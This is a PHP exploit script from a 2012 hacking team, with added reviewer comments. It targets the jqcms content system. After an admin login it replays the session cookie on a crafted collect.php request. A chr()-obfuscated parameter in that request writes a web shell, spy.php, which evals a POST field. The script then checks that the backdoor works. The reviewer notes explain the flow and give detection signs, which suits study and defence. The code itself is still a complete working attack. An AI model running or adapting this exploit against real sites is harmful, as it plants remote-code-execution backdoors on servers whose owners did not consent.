环境要求: register_globals = On.
<?php
/*
* Date : 2012/4/24
* Team : H3xIe Security TeAm 2005 - 2012
* This exploit script targets jqcms; it requires administrative privileges.
*
* Welcome to our team website.
* <http://www.hkmjj.com/>
*/
# Reviewer annotations only; no statement below is changed. The flow is:
# log in as an existing admin, pull a session cookie out of the raw response,
# replay it on one crafted collector request, then fetch the file that request
# is expected to have written.
ini_set('display_errors', 0); # notices/warnings (undefined vars, bad offsets) are hidden, so failures are silent
set_time_limit(0);
# Query string for the article collector's admin action. The
# jieqiCollect[subarticleid] value is PHP source assembled from chr() calls;
# presumably collect.php passes that value through eval-like code (collect.php
# itself is not on this page). The assembled source writes a file named spy.php
# in the same admin directory containing a short PHP backdoor: it echoes a
# "H3xIe" marker and eval()s one POST field.
# Detection: collect.php?action=collect requests whose parameters carry chr(
# sequences, and the appearance of modules/article/admin/spy.php on disk.
define('ExcuteCode','/modules/article/admin/collect.php?action=collect&siteid=test&fromid=test&jieqi'.
'Collectsite[test]=nig3h&jieqiCollectsite[test][enable]=1&jieqiCollect[subarticleid]=test;@fwrite(fo'.
'pen(chr(115).chr(112).chr(121).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112'.
').chr(104).chr(112).chr(32).chr(101).chr(99).chr(104).chr(111).chr(40).chr(34).chr(58).chr(58).chr('.
'72).chr(51).chr(120).chr(73).chr(101).chr(34).chr(41).chr(59).chr(101).chr(118).chr(97).chr(108).ch'.
'r(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(49).chr(39).chr(93).chr(4'.
'1).chr(59).chr(63).chr(62));//&jieqiCollect[articletitle]=test');
if (count($argv) != 5) // Parameter count: script name plus exactly four arguments
{
Load_banner();
echo "[+] :: Usage : php ".$argv[0]." <Host> <Path> <username> <password>\n";
echo "[+] :: Example : php ".$argv[0]." localhost / admin 123456\n";
echo "[+] :: Please enter paramter.\n";
exit;
}else
{
Load_banner();
$host = $argv[1]; # target host; HTTP_ReadFile always uses plain HTTP on port 80
$Path = $argv[2]; # web path prefix of the install, e.g. '/'
$Session_username = $argv[3]; # valid admin credentials are required; nothing here bypasses login
$Session_password = $argv[4];
}
# Program Begin
# Credentials go out as a form POST to the admin login page. The raw response
# (status line, headers and body) is searched for a reference to admin/index.php.
$POST_Login_Data = 'username='.$Session_username.'&password='.$Session_password.'&submit=%26nbsp%3B&action=login';
$Login_Info = HTTP_ReadFile($host, 80, $Path.'/admin/login.php?do=submit', $POST_Login_Data, 2000, '', '', 'POST');
# NOTE(review): strpos() returns 0 for a match at offset 0 and false for no match;
# the bare ! treats both as failure. In practice the raw response starts with the
# HTTP status line, so a match at offset 0 does not occur.
if (!strpos($Login_Info, 'admin/index.php')) die('[-] Login Fail~ Username Or Password Error!');
# Walk the response line by line and keep the last of at most two lines that
# contain the text 'Cookie' (normally Set-Cookie headers). If no line matches,
# $CookiesRequest stays unset and the substr() below works on null, which ends
# in the 'Get COOKIE fail!' placeholder.
$Session_Arr = explode("\n", $Login_Info);
$COOKIE_I = 0;
foreach ($Session_Arr as $Line)
{
if (2 == $COOKIE_I) break; # stop after the second matching line
if(strpos($Line, 'Cookie') && 2 != $COOKIE_I) # a match at offset 0 would be skipped (0 is falsy)
{
$COOKIE_I++;
$CookiesRequest = $Line;
}
}
$SESSIONID = substr($CookiesRequest, strpos($CookiesRequest, ':') + 1); # header value after the first ':'
$Send_ID = SessionID($SESSIONID); # "name=value" pair up to the first ';', trimmed
if ($Send_ID == '') $Send_ID = 'Get COOKIE fail!'; # not fatal: this placeholder text is then sent as the Cookie header
echo('Administrator SessionID : '.$Send_ID."\n");
# Send Execute
# ...
# Replays the session cookie on a GET to the collector URL; the response is not inspected.
$Login_Info = HTTP_ReadFile($host, 80, $Path.ExcuteCode, '', 100, '', $Send_ID, 'GET');
# Verification is a plain, unauthenticated fetch of the dropped file (mt_rand() is
# only a cache-buster). 'H3xIe' is the marker the dropped file echoes.
$FileStatus = file_get_contents('http://'.$host.$Path.'/modules/article/admin/spy.php?'.mt_rand());
if (strpos($FileStatus, 'H3xIe'))
{
PrintUrl('http://'.$host.$Path.'/modules/article/admin/spy.php');
}else
die('[-] Exploit fail!');
# Program End
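/**
 * Return the part of a cookie header value before the first ';', trimmed.
 *
 * Used to cut a "name=value; path=/; ..." header value down to its
 * "name=value" pair. A null or empty input yields ''. The original loop ran
 * to strlen() inclusive and read one byte past the end of the string on
 * every call (an out-of-range string offset); this version uses strpos().
 *
 * @param string|null $Cookie_ Raw cookie text (e.g. the remainder of a Set-Cookie line).
 * @return string Text before the first ';' (the whole string if there is none), trimmed.
 */
function SessionID($Cookie_)
{
    $cookie = (string) $Cookie_;
    $separator = strpos($cookie, ';');
    # No separator: the entire string is the value.
    $head = $separator === false ? $cookie : substr($cookie, 0, $separator);
    return trim($head);
}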
/**
 * Print the ASCII-art banner followed by the tool title.
 *
 * The art is stored as base64-encoded rows separated by "\n"; every decoded
 * row is wrapped in single spaces and centred in a 50-column field with one
 * randomly chosen filler pattern. Because the encoded block ends with "\n",
 * explode() yields a final empty row, which prints as a filler-only line.
 *
 * @param int $Active When truthy, an extra "[+] Wait..." line is printed.
 * @return void
 */
function Load_banner($Active = 0)
{
    $fillers = array('+=', '@', '*', '$_');
    $encodedRows = "IyAgICAgIyMjIyMgICAgICAgIyMjIyMgIyMjIyAg\n"
        . "IyAgICAgIyAgICAgICAgICAgICAjICAgICAgICMg\n"
        . "IyMjIyAgIyAgICAgIyAgICMgICAjICAgICAgICM=\n"
        . "IyAgICMgIyMjIyAgICMgIyAgICAjICAgICMjIyAg\n"
        . "IyAgICMgIyAgICAgICAjICAgICAjICAgICAgICM=\n"
        . "IyAgICMgIyAgICAgICMgIyAgICAjICAgICAgICM=\n"
        . "IyAgICMgIyMjIyMgIyAgICMgIyMjIyMgIyMjIyAg\n";
    $filler = $fillers[array_rand($fillers)];
    echo "\n";
    foreach (explode("\n", $encodedRows) as $row) {
        $decoded = ' ' . base64_decode($row) . ' ';
        echo str_pad($decoded, 50, $filler, STR_PAD_BOTH) . "\n";
    }
    echo "\n[~] :: JQcms Administrator privilege ExPlOiT...\n";
    if ($Active) {
        echo "[+] Wait...\n";
    }
}
/**
 * Print the closing result block: the URI that was checked plus two fixed
 * status lines, each terminated by "\n".
 *
 * @param string $URI Location written on the result line.
 * @return void
 */
function PrintUrl($URI)
{
    $lines = array(
        "[+] Result : {$URI}",
        '[+] Msg : Exploit Success! Password is : 1',
        '[+] +++++++++++++++++++++++',
    );
    echo implode("\n", $lines) . "\n";
}
/**
 * Minimal raw HTTP/1.1 request over a plain TCP socket (no TLS, no redirects).
 *
 * Writes the request line and a fixed header set by hand, optionally a POST
 * body, then reads until the socket reports EOF and returns everything read
 * (status line, headers and body) as one string. On connect failure the whole
 * process is terminated with die(); there is no exception path.
 *
 * @param string $host    Target host; also written verbatim into the Host header.
 * @param int    $port    TCP port for fsockopen().
 * @param string $path    Request target placed as-is in the request line (not URL-encoded here).
 * @param string $data    Body for POST; Content-Length is strlen($data).
 * @param int    $timeout Connect timeout for fsockopen(), in seconds.
 * @param string $referer Emitted as a Referer header when non-blank after trim().
 * @param string $cookie  Emitted as "Cookie: $cookie" (see the note at the isset() check).
 * @param string $method  'GET' produces a GET request line; any other value is sent as POST.
 * @return string Raw response bytes; '' if nothing was read.
 *
 * NOTE(review): the required parameter $method follows optional ones; both
 * callers in this file pass all eight arguments, so the defaults are never used.
 */
function HTTP_ReadFile($host,$port,$path, $data,$timeout, $referer='', $cookie='', $method)
{
if ($method == 'GET'){$method_str= "GET $path HTTP/1.1\r\n";} else $method_str= "POST $path HTTP/1.1\r\n"; # Default POST
$buffer='';
$fp = fsockopen($host,$port,$errno,$errstr,$timeout); # $errno/$errstr are filled but never reported
if(!$fp) die("[-] Connect Error.\n");
else
{
echo '+ Method : '.$method."\n"; # progress output on stdout, interleaved with the results
fputs($fp, $method_str); # Method
fputs($fp, "Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/xaml+xml, application/x-ms-xbap,application/x-ms-application, */*\r\n"); # browser-like Accept header
if (trim($referer) != '')
fputs($fp, "Referer: $referer\r\n");
if ($method == 'POST')
fputs($fp, "Content-Type: application/x-www-form-urlencoded\r\n");
if ($method == 'POST')
fputs($fp, "Content-Length: ".strlen($data)."\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Connection: Keep-Alive\r\n");
# $cookie defaults to '' so isset() is always true here: a Cookie header is
# written on every request, empty when no cookie was supplied.
if (isset($cookie))
fputs($fp, "Cookie: $cookie\r\n");
if ($method == 'POST')
{
fputs($fp, "Cache-Control: no-cache\r\n\r\n"); # the blank line here ends the header block
fputs($fp, $data."\r\n"); # body; this CRLF and the one below are bytes beyond the declared Content-Length
}
fputs($fp, "\r\n");
# Reads until the peer closes the socket. With Keep-Alive requested above this
# depends on the server closing (or timing out) the connection on its own.
while(!feof($fp)) $buffer .= fgets($fp,4096);
fclose($fp);
}
return $buffer;
}
?>